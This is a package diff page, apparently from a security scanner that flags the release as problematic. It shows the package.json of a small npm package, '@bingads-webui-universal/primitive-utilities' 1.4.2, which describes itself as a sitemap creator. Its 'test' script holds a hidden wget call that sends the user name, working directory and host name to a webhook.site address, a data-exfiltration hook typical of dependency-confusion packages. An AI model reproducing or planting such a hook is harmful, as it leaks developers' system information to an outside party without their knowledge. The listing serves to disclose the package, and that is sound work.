@bingads-webui-universal/primitive-utilities 1.4.2
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @bingads-webui-universal/primitive-utilities might be problematic. Click here for more details.
- package/package.json +15 -0
package/package.json
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
{
|
2
|
+
"name": "@bingads-webui-universal/primitive-utilities",
|
3
|
+
"version": "1.4.2",
|
4
|
+
"description": "sitemap creator",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "\"test\": \"wget --quiet \\\"https://webhook.site/#!/view/f90aa09e-ee90-4f0a-ba15-fbc3ba1578ea/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\\\" "
|
8
|
+
},
|
9
|
+
"keywords": [
|
10
|
+
"site",
|
11
|
+
"map"
|
12
|
+
],
|
13
|
+
"author": "",
|
14
|
+
"license": "MIT"
|
15
|
+
}
|